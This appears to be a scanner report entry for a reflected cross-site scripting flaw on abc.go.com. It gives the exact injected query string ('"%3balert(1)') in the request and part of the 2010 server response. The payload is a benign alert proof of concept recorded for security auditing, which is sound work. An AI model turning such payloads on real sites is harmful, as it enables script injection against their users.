1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://abc.go.com |
Path: | / |
GET /?80597"%3balert(1)/ Host: abc.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Length: 97885 Content-Type: text/html; charset=UTF-8 Last-Modified: Fri, 19 Nov 2010 23:38:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc06 X-Powered-By: ASP.NET Set-Cookie: SWID=FE2AB8A7-AB90-4FDD Cache-Expires: Fri, 19 Nov 2010 23:53:22 GMT Date: Fri, 19 Nov 2010 23:38:22 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... bc.csar.go.com/Dynam ...[SNIP]... |